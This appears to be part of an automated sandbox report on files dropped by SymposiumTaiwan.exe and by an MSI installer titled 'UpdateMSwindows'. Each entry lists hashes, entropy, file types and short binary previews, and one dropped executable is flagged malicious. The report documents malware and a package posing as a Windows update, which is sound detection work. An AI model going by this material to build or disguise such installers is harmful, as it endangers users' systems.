                                            Malicious:false
                                            Preview:change...TerminateThread.>.LoadLibraryExW..M.FindResourceExW.u.CopyFileW...VirtualFree.^.FormatMessageW....GetExitCodeProcess..X.SetErrorMode..B.GetPrivateProfileStringW..+.WritePrivateProfileStringW..@.GetPrivateProfileSectionW.).WritePrivateProfileSectionW.?.GetPrivateProfileSectionNamesW..$.FileTimeToLocalFileTime.%.FileTimeToSystemTime....SystemTimeToFileTime..F.LocalFileTimeToFileTime...GetDriveTypeW...GetDiskFreeSpaceExW...GetDiskFreeSpaceW...GetVolumeInformationW...SetVolumeLabelW...CreateHardLinkW.a.SetFileAttributesW....CreateEventW..Y.SetEvent....GetEnvironmentVariableW.W.SetEnvironmentVariableW...GlobalLock....GlobalUnlock....GlobalAlloc...GetFileSize...GlobalFree....GlobalMemoryStatusEx..6.Beep..p.GetSystemDirectoryW...HeapReAlloc...HeapSize....GetComputerNameW....GetWindowsDirectoryW....GetCurrentProcessId.N.GetProcessIoCounters....CreateProcessW..L.GetProcessId..}.SetPriorityClass..?.LoadLibraryW....VirtualAlloc..KERNEL32.dll....DestroyIcon...MessageBoxA.-.GetForegroundWi
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):6.429897600323615
                                            Encrypted:false
                                            SSDEEP:768:iZP40VLhDPCp5eqMw0jR6s6bvx875rLjDsOc/WY7Jx2pQ44GMKnPml5Dhh/xGop0:2Pp5q/qw0j8sgyZpQ4VMEPmfP/b/psX
                                            MD5:4C37159F85553DEF2883F4453218D072
                                            SHA1:FE1A4E4AEE90F3B76F72067B10D9DECE9060C75D
                                            SHA-256:EF4A7D7ED216D18CB47B27FE8EF5D435254C5C3B26B67010BB6D3D6CFD19ED0E
                                            SHA-512:06644D58BD3492E61436D16239AB30A033172917CCC3E608AB78A41CD293F2931C8B1787EF8E379B048BD904F26E619160B4899C5A0BF545221CFDD7DE5BE5BE
                                            Malicious:false
                                            Preview:D$(.D$...t.........t$.........D$4.....D$(.......D$.......j.R.0.D$.....0.....D$$.L$@@.D$.....D$.@.t$\.D$.;A.......h,.K...$@..........$....3...$.....j....H#.j.P..$H...P.V.....$<....B....D$@..j.j..@.@P.P/.....L.......$......t.Q.Q....$..........$.........H...........<....$.kED..L$0..t.Q......D$0.....D$4......................$..ED..D$(....q...P..\.I..t$(.Y....t$(....U....N..?....L$(....A...Q.{....6....D$(.p..........t$(......L$(........Q. <........L$(........Q..<........t$(...............t]V..\.I..K..tP.N..=..tGQ........=.v.........'..t,Q...;..."..t.Q...;......t.......V.Y........$.....$.........$..........-....$.....-...............Y.......~....$..........$......xL.P.D.............$.....t..$......P.........t..$.....$.........$.........$...............$......$....h.?J..$..........$.....M...j...$.....p.L.P..$....P......$.........Y......F.j.j.@P.,....$.....Y..........$.....o.....~....$.....^.....}..j...D.....l.I...$....=.......~....$....P..D.......I...D.....X.I...$...
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11264
                                            Entropy (8bit):6.5505524572509435
                                            Encrypted:false
                                            SSDEEP:192:iO9jEPp0pS3XI8IhwLZXBlHoLGqoozNnmd+/YLlLGcopEII6XBc:Pts0pLfCvEGqooAdQGcA6XBc
                                            MD5:8A4AC337026D6F73C85981B18FA1E648
                                            SHA1:1385E070B2AF4B87B9EA5076B544DEF879A91D4D
                                            SHA-256:57F70CCB47B4A699C3B02671B10C4DA55CD3C247114DDC4B09C6C8DA5B90ACC9
                                            SHA-512:9E195A68F47F18787741EDD4F4898458F73647FAE19ABB3BBEDF97F52FE21D76F3F0358BAA153FF305E21DED9570FBF658EA8BB3089E80B47EBCF6407B00C3A1
                                            Malicious:false
                                            Preview:......U.;U.r.........E..;....................;.s.................U.f;M...ig..;...\...f9...S.......U.;.r..D.....w.....E......u...... ..(e....@....M.......w..............u..............`e....+...=...........}....<..........B;..................E.f;....h..;.s.f.....f;.tB;.r.3..}...........................j......M.....}..... ..t....5j.....;.s.................S.........I.........?.........5...3..U.........n.........d...................................................................................].....................U.....3...............gJ.........................3..f.........n.........d......U...P...S....].E.VW.....i...u..E......E........NP.M.;F........U.@...E.;F.................i........E......E......................A..$.`.A...C..........+..}....f;....v.......f;....v..3.M..}r..E....f;E........E....f;E........E....f;E...[....E....f;E...J....E....f;E...9....E....f;E...(........x...u.......f9...........].......U..].;........E................................_^[..]
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):190464
                                            Entropy (8bit):7.999046470084307
                                            Encrypted:true
                                            SSDEEP:3072:ETbJzX8JmJ8SSiyZFu4Z8M1sDactuUJ8r3qKJ5eVakvrccNfz36gnzkDAXvJw0yt:ET5iya5FNs9Cqm94rBfJzEAXvW00gc
                                            MD5:22691791D3A733DEC6493CE2CCA63D73
                                            SHA1:6EFDB37C4C2513E7548F4CECC195AF0BB0A8C881
                                            SHA-256:D7A52B0FC747E94CED1A692F40633CE42811AC6142167A193A793A76F452FCFE
                                            SHA-512:39B79737F1638C844A7C71E736192A7E39E451C9FAAD877913534DC3A279DC99B84E2305134FCAC089935927EF3EC51BB45A7593D0CD78CB6F7BF8875BED2EBD
                                            Malicious:false
                                            Preview:uy....$.N...r.7.......din.........aO.h.R.".{...I......b...5..C..2Sw._4Q5...b..9_....P7..Es36J..7r...A.|...C........E.........A...?C..vvH....E.kTt}..x.^c?............z.i....xe..v...0y..Q...%1s.4...3#V...Y.*.)..N.........-GC....`...!&`.....q.sT.....C....P?.p@..........d........[(.l.N.k.Y.0..NfNe%..b.7Q.=....w..S.M.L.k"E+3...f\..........p.*...%qo..h.\?...0-..8..Z..2L;........0.[H.H..H....{...o.O........GJ...d..i9..]6.X-.....?....,^O.r..|.T.d.C.z.v&H.PE..@.J.a.;OPoK.u......vV._.?).b......2Wj.}L{...{`.H...bAU.LHh.7..Z.1...*<.o..@/.g..+.y.-..../FU..iAI..Lzd..Z........W@.Zi...:.)aY..H...{B.A.M.[.Q...'.:('.`.6_*..)..Vt.........M.7N.9.s.!/..D.?.$.r....t..)...S..8..c.S..'n..........Z..&.t.M.}[N...4. ..m.w...k...E...YE*..C.e....I2U....d.D{.p...S.7L..3=...w......k8fD.X.C/..l..:...s..y....e...$..b..i...[b..s...<...Y-..:O.f.H.....4.j....j....~aj..U.W...t......X..*.@....l.Y.......... .p...W..L..6...,...<p.Z6.6X......c_.k.R.^x8[E8".4)......M .Y...,..X.so[
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):21504
                                            Entropy (8bit):4.796794310366761
                                            Encrypted:false
                                            SSDEEP:384:+qLyH3PeB166+5n9cl/boETcfKjxqSl1qIvtx4MjNYREfP5Vpj81omx5MOUyM0pn:gWBA60iPTcf4qSq25N8EH/i6mxyyM0p
                                            MD5:9882E92DB973318F32F3505B791FFC9D
                                            SHA1:B16FEFC8D2AB20F6C162BE4F17F523A3DC325424
                                            SHA-256:4F0FCD6A11F1FC9CAF98B25BEECCDCEC493AC4BAE19EC482BF2A0042A7C39C8E
                                            SHA-512:C6222CF2D747FB2CFFDEBC0B375E8DB39D87B0FE53208B94D4AE7D77E1FEDE3BEA07408CFD3F90B4A25B77017152A054E2D65BBAB934494266F466A4FB871D52
                                            Malicious:false
                                            Preview: allowed.inconsistent NEWLINE options.\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number.a numbered reference must not be zero.an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT).(*VERB) not recognized or malformed.number is too big.subpattern name expected.digit expected after (?+.] is an invalid data character in JavaScript compatibility mode.different names for subpatterns of the same number are not allowed.(*MARK) must have an argument.this version of PCRE is not compiled with Unicode property support.\c must be followed by an ASCII character.\k is not followed by a braced, angle-bracketed, or quoted name.internal error: unknown opcode in find_fixedlength().\N is not supported in a class.too many forward references.disallowed Unicode code point (>= 0xd800 && <= 0xdfff).invalid UTF-16 string.name is too long in (*MARK), (*PRUNE), (*SKIP), or (*THEN).character value in \u.... sequence is too large.invalid UTF-32 string.setting UTF
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):23552
                                            Entropy (8bit):7.9928665611195715
                                            Encrypted:true
                                            SSDEEP:384:lX8/mfP4nRuz2Ng48SR+BGRatEN07Pzxc36TPQ+qm0mnPgo+bqAe9msaqMeX3lv+:lqmfP4nqKg4hcBGY6N07POwQ+h0mdAqm
                                            MD5:5186F1AC9A41B0E0C69AC5B2A9B7DB08
                                            SHA1:5DF69596B33803E2B5EFE76878A88F05685A4610
                                            SHA-256:97DED545189CEB180C5C14ED1296B65CC75454F3404352E990CCB351FFC415EA
                                            SHA-512:6901BF59349B570630415FD280F764BB43C7CCC6200F07DDDA95B1ECA85470BCBD598699C445A1997119C58EC84E5E77E88E0DEC003AC583E69C1A3E0399D940
                                            Malicious:false
                                            Preview:M6....u..it}...G.]&..h.R.d...!....J....t...0..F..~0..i.y...........B ...O..}W.5..8.....C.C.(E....uI....#..|...H..BU...g..6.......B...j#P..P.K...........")=.... ..z?..I.........p.^..e.........N...v.h....wR.U$).l...W.^.cx... ...........bQ..s%..!?chV....b.C.|0...3.0..@.H.Ah.a..91Z...l..QC...........tX...*..b...X..D....#..D....$......c..+.q;=...*.F'.. 1........?/.Z..?rM...S....p.>."Ug.v....RJl1.^^..7r./?...P...D.....m...j.UCdaT|...f.&hn4.U.ru8.{W...[../.A^H..6..a$.....L.L.'.....ML...V..=>...1>.JA..<.#~./'.W....... ..@.`Z.{W.YmX.a.98.../.*..3.!HYV..j....Q...?..?N..,'m.S....b...]..<..J....*.z.S..J@)Z..>....+..4U2"C..v.NF.UO.g....... .f..P......5..H.vs.....8a...U....N....>Wgiz..\.`rI...G......9..g.;E..E6W.fDx'].F.i....g.G.-..\UoU....t...........C\.+a....._.:...&Q!V..cG.=.0x.5...w........,n@.....\..@>i.R.q....Zm(.&>!>z./.....T.dv.E.....g........}..2|.K......%C^-.{......W.$U...k,..\.."...]./u.......+.0...@|....qWg...`..jm.`...dS..Q.....|..w.K......[x.j.?.Kg
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):19456
                                            Entropy (8bit):6.495926521481171
                                            Encrypted:false
                                            SSDEEP:384:4xtX1wzS61I/vHhH30wirfCcU0oSMFHEQs4NyYLYeQVuMt2FoLglQRg:4xtXazSTvHZ9ijrUTSu7YeQ0p48
                                            MD5:00A130481474B4132C982A6D95886EAE
                                            SHA1:4DD83CC3EAA4BD944E01ABD072BDD31043BB81A2
                                            SHA-256:9BE525DD455DFB9C1AFFF50A47BB5B62DD4315526DD49BC3A7B4FC6F1F0439F1
                                            SHA-512:85A0A53E89A691EB3A0DA93F4D349E860092CCEB3E47B1CA2D7072B58C4A5AD31DB1A9D01D0082E1D5F071DE86A23EC3B1E2A3EBE202FA4E051D8C7BB1EAA76A
                                            Malicious:false
                                            Preview:y.L$.........$......\...T$,......E....E..@......@.P.....E....E..@.....L$...@.Ph.....x....$...G.....L$...@.Pjn.^.....$.....\....$.....y\....t$Xjm.L$..5....T$$.T$..n....L$.......T$$.T$..X..........k..P..\.I..7.w.......k..Q......j.........j..Q..P....j.....p.........7.<.......j..Q.....j.........j..Q....j...7.....j.....*..V.P.......j......C.[c@.[c@...C.[c@...C.,.C.H.C.r.C.r.C.].C...C..c@..c@...C..c@...C...C.".C.L.C.L.C.7.C...C.Ra@.Ra@...C.Ra@...C.).C.E.C.o.C.o.C.Z.C...C..a@..a@...C..a@...C...C...C.8.C.8.C.%.C...C..X@..X@...C..X@...C.3.C.D.C.n.C.n.C.Y.C...C..d@..d@...C..d@...C.*.C.N.C...C...C.g.C...C..X@..X@...C..X@...C...C...C.@.C.@.C.+.C...C..U@..U@...C..U@...C...C...C...C...C...C...C..b@..b@._.C..b@...C...C...C...C...C...C...t..M..9...P...^...y......Y...#..C......ry...............V.u...H.I......y..V............E...P.....3.@.y..h..I.........$....z...G.P.p..,....E.....w..G...%z...G....t....t.....T...~.....s\.....V..|......u..........9W.a....M.........1.q.V......M.....n.
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):27648
                                            Entropy (8bit):6.416171575010537
                                            Encrypted:false
                                            SSDEEP:768:2ADK1c+d9Y9TnzA/o7uGwr9FTqvRYZLjNGj0toimJN:o1c+d9YUtq5Ydzh2
                                            MD5:E50DE998A256E01E6536B4281F3178A0
                                            SHA1:01D9D580F43CE908E4D760D9F77D7CB066F9AB9E
                                            SHA-256:E4A862172EAB45BAE8629B6739209EBE566226FB061E519C4A9FCC8F0F9F93EF
                                            SHA-512:428564A3AA55F508BB0FEEEB4FCE1AD47D831F9A7EFAB7A6CBC4DF7C29442F9E087778061F90ECC85FA6108FA85636E67429000B3E3AB5A551A0C2858C6DA42A
                                            Malicious:false
                                            Preview:$...3...D$...t..L$X..3...|$..t..u.....d..3.Pj......t$..D$8VP......u..u....d..3.A3.P.N.Q._...3.3....V.L$,..,..f9.t.V.L$,..,..j;YFf9.u.G..|$,..\$..t$ .t$..|$..|$.v".D$ .L$(HP.,..j;Yf9..D$.t.@.D$....D$.3.F..N..L$ ..~<.N@.L$..A.P.D$,P..............L$.......F..D$ @.L$..D$ ;D$.|.j@...B.3.h.0......B.VP..(.I.V...D$$h..B.V.n&............|$$......q.....B..L$....n.B..@.).G....'.B..X..../.B....B..H.3.9A.t9.y..t3...f.A.f.F..).u....Sc..3.Pj..F..........H...........u....*c...G..F........L$(..2...L$8..2.._^3.[..]...U..E.VW...@....Xe....Nx,;.....}$..........8.t..0....I........... ....u....b...&..F....._3.^]...U..E.SV..@..0....b...F..0..$.I....u...u..u....lb......R......W3...t..........8.t.G...;.r.;.u..E.P.......................0.u.....b...G..._.F.....3.^[]...U..SV.u.3.W...~..v-.F..H........u..u.....a..!.Sj.._.F..H........N..e...1...-a...N.....u.......A..B..A..B..A...B.S...E.P.....u"...|a...&.j..u..F........H......._^3.[]...U.......SVW.}...O....x..t'.u....2a..3.@j..F.P.&....H....
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):57344
                                            Entropy (8bit):4.877417636552265
                                            Encrypted:false
                                            SSDEEP:384:Uu88888888888888888888888888888zv888888NfU84444Qnooooooooooooooq:U/SS+At
                                            MD5:8DF61919DA514A7A227EEC18A671B1C6
                                            SHA1:2C6CA656264195F06DFEEE6EA0F54C61735F82DA
                                            SHA-256:88D9A96883DC6D7DA890C99EF037012E9D182FDEFB534AD585055A3508BF44A5
                                            SHA-512:E8F2E0A360DE021CD14566E2C9F5FE255C8AC791B5A1BBAEB70C792736A05A966F734492261AD7F81218AD9B1EFCA0ABC3A007F7BF72F1D092CE4A71CDDF04C7
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9216
                                            Entropy (8bit):6.429953986716093
                                            Encrypted:false
                                            SSDEEP:192:PHoTiQjLjQpkNVtMr2tsK8tn6tMMqRC2b5LNS6gCDZT5Bztld:/bnOaRC2b5LKC/B5ld
                                            MD5:91C5603640ED6185CC1632A4A082B258
                                            SHA1:B09A21215DF734742A616690B7A3B064C78A2ED6
                                            SHA-256:21CA6466E4CCEF48640DA37A48505729786C43BAFB7C024EEC7BE34E9C50B367
                                            SHA-512:0E91E5C28BD7B744713E803555304236F0C4BA176073EDD8BD4DBCDD642165C8976342578786EB9BB4CAB561C25EB37C59A4AB977F089353ECA3B95DAA24B9C6
                                            Malicious:false
                                            Preview:...[......\d...u..Td.........d..3.f........d...u$.u .u..u.QP.u.WVS.......e...u$.u .u..u.QP.u.WVS.....d...u$.u .u..u.QP.u.WVS.......d...u$.u .u..u.QP.u.WVS.7....d...u$.u .u..u.QP.u.WVS.x....d...u$.u .u..u.QP.u.WVS.....qd...u$.u .u..u.QP.u.WVS.F....Sd...u$.u .u..u.QP.u.WVS......5d......E,..P.a...s....u$.u .u..u..u..u..u.WVS.~.....d...u$.u .u..u.QPQWVS......c...u$.u .u..u.QPQWVS......c...M,....PQ.u .u..u..u..u..u.WVS....c...u..u.WVS.:....c...u$.u .u..u.QPQWVS.;....qc...u.WVS......ac...u..u..u.WVS....Kc...u.QVS......;c...u..u..u..u.WVS....."c...u$.u .u..u.QPQWVS.f.....c...u..u.WVQ.~.....b...u$.u .u..u.QP.u.WVS.......b...u$.u .u..u.QP.u.WVS....b...u$.u .u..u.QP.u.WVS......b...u$.u .u..u.QP.u.WVS......{b...u$.u .u..u.QP.u.WVS......]b...u..u.WVQ....Jb...u$.u .u..u.QP.u.QVS.....,b..W..wL..NX...}..u..E.3.f9...x...3..t...3.9Cpu'.{|Uu!..........u.9.....u...........b..P.......Cl.............s|PVS....M(..a...}..t..}.....a...6..(.I...3.PPj1.6.E ....I..=..I.PS..U....E..P..
                                            Process:C:\Users\user\AppData\Local\Temp\MSI53B9.tmp
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):895074384
                                            Entropy (8bit):0.023559850275401733
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9A721DDFD6C94D81EF78858A85F1083A
                                            SHA1:4A8C2CC4B1F242D74A05627CDB7E252BA3B4AA0B
                                            SHA-256:C1E27B2E7DB4FBA9F011317FF86B0D638FE720B945E933B286BB3CF6CDB60B6F
                                            SHA-512:446208757A1CA96023AD2B1907F9034A48FA09FA6BFE7AAD621A476FE348CD19A6EC79A18AF9491EABCCE75FC38BE27766AC48E3A6C6B7DC0FD1017DEBC00EA1
                                            Malicious:true
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@..........................0............@.................................@........................oY5HQ...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {94DF14AB-36C1-4886-A54A-687987508C4D}, Number of Words: 2, Subject: UpdateMSwindows, Author: UpdateMSwindows, Name of Creating Application: UpdateMSwindows, Template: ;1033, Comments: This installer database contains the logic and data required to install UpdateMSwindows., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 23 16:58:05 2024, Last Saved Time/Date: Tue Jul 23 16:58:05 2024, Last Printed: Tue Jul 23 16:58:05 2024, Number of Pages: 450
                                            Category:dropped
                                            Size (bytes):2580992
                                            Entropy (8bit):7.3463477510001045
                                            Encrypted:false
                                            SSDEEP:49152:6spIfhlTYEO+w2/64hnPRMB0WkuqES58NtvU:dIZlEN+wK6qRMB0WkufF
                                            MD5:3B48C90D4A283982CED898DF9570894B
                                            SHA1:ED07663C40D54FFF42AF99C2969971A3493F1BF7
                                            SHA-256:3ED535BBCD9D4980EC8BC60CD64804E9C9617B7D88723D3B05E6AD35821C3FE7
                                            SHA-512:42171B68A91D1D99CA127FC3AF875AC0EC961B85335D9BB809788CFE5951460FDC46D2A7DF2B1CEA54CF67E7631FCFF82D7D158104266450F8E1989786D284B0
                                            Malicious:false
                                            Preview:......................>...................(...................................g.......@.......................................................................................z...{...|...}...~...........................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9.......<.......=...B...?...@...A.......C...D...E...F...G...H.......J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...........i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {94DF14AB-36C1-4886-A54A-687987508C4D}, Number of Words: 2, Subject: UpdateMSwindows, Author: UpdateMSwindows, Name of Creating Application: UpdateMSwindows, Template: ;1033, Comments: This installer database contains the logic and data required to install UpdateMSwindows., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 23 16:58:05 2024, Last Saved Time/Date: Tue Jul 23 16:58:05 2024, Last Printed: Tue Jul 23 16:58:05 2024, Number of Pages: 450
                                            Category:dropped
                                            Size (bytes):2580992
                                            Entropy (8bit):7.3463477510001045
                                            Encrypted:false
                                            SSDEEP:49152:6spIfhlTYEO+w2/64hnPRMB0WkuqES58NtvU:dIZlEN+wK6qRMB0WkufF
                                            MD5:3B48C90D4A283982CED898DF9570894B
                                            SHA1:ED07663C40D54FFF42AF99C2969971A3493F1BF7
                                            SHA-256:3ED535BBCD9D4980EC8BC60CD64804E9C9617B7D88723D3B05E6AD35821C3FE7
                                            SHA-512:42171B68A91D1D99CA127FC3AF875AC0EC961B85335D9BB809788CFE5951460FDC46D2A7DF2B1CEA54CF67E7631FCFF82D7D158104266450F8E1989786D284B0
                                            Malicious:false
                                            Preview:......................>...................(...................................g.......@.......................................................................................z...{...|...}...~...........................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9.......<.......=...B...?...@...A.......C...D...E...F...G...H.......J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...........i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):835688
                                            Entropy (8bit):6.599296297782833
                                            Encrypted:false
                                            SSDEEP:12288:3nre4I5heqAlr0TQG21EX4Ttph0lhSMXleTueml5P96jJtvU0:3ryDzAlr0ufTPh0lhSMXl0uN58NtvU0
                                            MD5:AA88D8F40A286B6D40DE0F3ABC836CFA
                                            SHA1:C24EAB9E4B10B159B589F4C3B64EF3DB111EA1C8
                                            SHA-256:8D633EFEDA1249356B11BF8F46583242356E4F903056B53BD25A99511D1790A1
                                            SHA-512:6C2F2F6A2D66015F30158962D653E381136F0F30023380A0CE95BD0944D856113FBDE65DB52DBB3B5DE1C0E2EDF2CD53184E721C64B916834BE4198C61224519
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C......................................I.............................h..........)......A..........Rich...........PE..L....c`f.........."!...'.............K..............................................mZ....@A........................0...........,....0..................h:...@..........p...................@...........@............................................text...*........................... ..`.rdata...!......."..................@..@.data....'..........................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):835688
                                            Entropy (8bit):6.599296297782833
                                            Encrypted:false
                                            SSDEEP:12288:3nre4I5heqAlr0TQG21EX4Ttph0lhSMXleTueml5P96jJtvU0:3ryDzAlr0ufTPh0lhSMXl0uN58NtvU0
                                            MD5:AA88D8F40A286B6D40DE0F3ABC836CFA
                                            SHA1:C24EAB9E4B10B159B589F4C3B64EF3DB111EA1C8
                                            SHA-256:8D633EFEDA1249356B11BF8F46583242356E4F903056B53BD25A99511D1790A1
                                            SHA-512:6C2F2F6A2D66015F30158962D653E381136F0F30023380A0CE95BD0944D856113FBDE65DB52DBB3B5DE1C0E2EDF2CD53184E721C64B916834BE4198C61224519
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C......................................I.............................h..........)......A..........Rich...........PE..L....c`f.........."!...'.............K..............................................mZ....@A........................0...........,....0..................h:...@..........p...................@...........@............................................text...*........................... ..`.rdata...!......."..................@..@.data....'..........................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):835688
                                            Entropy (8bit):6.599296297782833
                                            Encrypted:false
                                            SSDEEP:12288:3nre4I5heqAlr0TQG21EX4Ttph0lhSMXleTueml5P96jJtvU0:3ryDzAlr0ufTPh0lhSMXl0uN58NtvU0
                                            MD5:AA88D8F40A286B6D40DE0F3ABC836CFA
                                            SHA1:C24EAB9E4B10B159B589F4C3B64EF3DB111EA1C8
                                            SHA-256:8D633EFEDA1249356B11BF8F46583242356E4F903056B53BD25A99511D1790A1
                                            SHA-512:6C2F2F6A2D66015F30158962D653E381136F0F30023380A0CE95BD0944D856113FBDE65DB52DBB3B5DE1C0E2EDF2CD53184E721C64B916834BE4198C61224519
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C......................................I.............................h..........)......A..........Rich...........PE..L....c`f.........."!...'.............K..............................................mZ....@A........................0...........,....0..................h:...@..........p...................@...........@............................................text...*........................... ..`.rdata...!......."..................@..@.data....'..........................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1875
                                            Entropy (8bit):5.70850302991596
                                            Encrypted:false
                                            SSDEEP:48:B5R8rvMfTPaiMpYD8SN9feqannouHX7+pMXCeKY8:B5RFWimw/eHnZ0gb8
                                            MD5:8775FAA5AD700EE9ABFB33ABC92F3A26
                                            SHA1:9AB41AF1F004FF5301AD112F7C9E2E541602F928
                                            SHA-256:74109C9A8E1A1F6FBE6F1D29EDD9857F48C69CCAAE4D3EC8CC17767A40EDA787
                                            SHA-512:7C14850DF265BAC95F0F28EAEA1CBCD1BAE216E010949C48E594D714C900886421F4240BF2667096F2FAB5C297AD2AD400FAE24F5058E680E63FC11C8B73E0E8
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{F7154933-FAB7-4F13-A08C-0291DB5E5D05}..UpdateMSwindows..NB4EASbynx.msi.@.....@.....@.....@........&.{94DF14AB-36C1-4886-A54A-687987508C4D}.....@.....@.....@.....@.......@.....@.....@.......@......UpdateMSwindows......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{EF0CC9F4-2421-4C1C-B08A-029700B2B11C}7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\.@.......@.....@.....@......&.{E7DD4B25-BE79-4B50-9770-B4FE0693249A}4.02:\Software\UpdateMSwindows\UpdateMSwindows\Version.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]...@.....@.....@.3..$..@....(.Software\UpdateMSwindows\UpdateMSwindows...@....%...Version..1.0.0%...P
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.1636391916723232
                                            Encrypted:false
                                            SSDEEP:12:JSbX72Fj//iAGiLIlHVRpZh/7777777777777777777777777vDHFwLLRx1Dit/z:Jx6QI5tmLj8iF
                                            MD5:14C73D8F3C3D982FF14771FA722E644E
                                            SHA1:A6B879AD142E364E2279B3D3D3D7C2B989C1D7FF
                                            SHA-256:FFA556401AE04C4A95243534A57DAE58E788384DE74A26CAA9D245979336443F
                                            SHA-512:889403270AC8077B87730BA672926B6F7F323A87EB5D3EAABD2914437CC9F3CA336DAC0053E30775D68E27033E86CE4D51860DF0EFAAE9913888A36D64F39E2A
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.589035988476092
                                            Encrypted:false
                                            SSDEEP:48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
                                            MD5:F60B4F7B83B2F4507BB654331EBEFD8E
                                            SHA1:EE73209239BA6C0535B54591C17E3E230E97B86C
                                            SHA-256:7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
                                            SHA-512:823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\msiexec.exe
